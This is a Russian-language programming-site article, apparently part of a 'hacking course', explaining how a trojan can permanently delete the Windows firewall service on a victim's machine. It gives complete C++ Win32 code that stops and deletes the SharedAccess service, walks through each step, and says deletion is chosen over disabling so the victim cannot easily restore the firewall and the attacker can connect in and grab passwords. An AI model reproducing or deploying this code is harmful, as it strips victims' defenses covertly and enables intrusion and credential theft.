C++ C++ C# C# ASP.NET Security ASP.NET Security ASM ASM Скачать Скачать Поиск Поиск Хостинг Хостинг  
  Программа для работы с LPT портом...
Язык: .NET — ©Alexey...
  "ASP.NET Atlas" – AJAX в исполнении Micro...
Язык: .NET — ©legigor@mail.ru...
  "Невытесняющая" Многопоточность...
Язык: C/C++ — ©...
  01.05.2010 — Update World C++: Сборник GPL QT исходников
  15.12.2007 — Весь сайт целиком можно загрузить по ссылкам из раздела Скачать
Хостинг:
Windows 2003, ASP.NET 2.0
бесплатный и от 80 руб./мес


   Отправить письмо
Кулабухов Артем, Беларусь




 Убиваем виндовый брандмауэр / Сервисы / Visual C++

         Убиваем виндовый брандмауэр

          Здравствуй уважаемый ученик моих курсов по хаку! Ну, наконец-то ты с горем по-полам, еле-еле сделал свой примитивный троянчик, его запускает жертва!

          И??? Ничего не происходит? Тебе приходит IP жертвы на мыло, а ты тем самым не можешь к нему законнектиться, узнать пароли и т.д? И ты точно уверен, что он только вчера сел за комп? Он не знает о существовании фаерволлов, брандмауэров, антивирусов? Да? Тогда все ясно, его защищает хрень под названием “Виндовый глючный брандмауэр для ламаков“.

          Данная супер разработка от мелкомягких была создана для повышения безопасности пользователей Internet. Включена она в винду, начиная в XP'ени, и дальше…. Смысл ее работы таков: Данный брандмауэр защищает от атак и левых коннектов извне, но изнутри все открыто! А ты думаешь, почему тебе пришло письмо в IP жертвы на мыло?

          Теперь, что нам надо………Нам надо открыть доступ и снаружи! Зачем закрывать то, что должно быть открытым? ;-)) Данный брандмауэр встроен в виндовс как сервис, который загружается вместе в ней! Я вот подумал, а может удалить его? Конечно, можно отключить, но жертва может заметить, и опять его врубит и т.п., а в случае удаления, его можно восстановить только после “format c:“ ;-) и полного перевешивания винды. А, я думаю, что ему будет очень влом этим заниматься :) Приступим к кодингу!

          Ниже приведен код удаления брандмауэра:

SC_HANDLE hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
if (hSCM != NULL)
{
SC_HANDLE hService = OpenService(hSCM, “SharedAccess“, SERVICE_STOP | DELETE);
if (hService != NULL)
{
SERVICE_STATUS Status;
ControlService(hService, SERVICE_CONTROL_STOP, &Status);
Sleep(200);
BOOL bOk = DeleteService(hService);
}
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCM);

          А теперь подробнее:
1) Чтобы работать с сервисами нужно получит хендл на них:

SC_HANDLE hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

          2) Затем необходимо уже получить хендл на сам сервис: он называется “SharedAccess“, с правами на остановку и удаление:

SC_HANDLE hService = OpenService(hSCM, “SharedAccess“, SERVICE_STOP | DELETE);

          3) ну и удаляем его, не забыв предварительно остановить! Кстати, заметьте, что для корректной остановки и удаления между ними есть пауза в 200 миллисекунд:

SERVICE_STATUS Status;
ControlService(hService, SERVICE_CONTROL_STOP, &Status);
Sleep(200);
BOOL bOk = DeleteService(hService);

          4) Освобождаем ресурсы:

CloseServiceHandle(hService);
CloseServiceHandle(hSCM);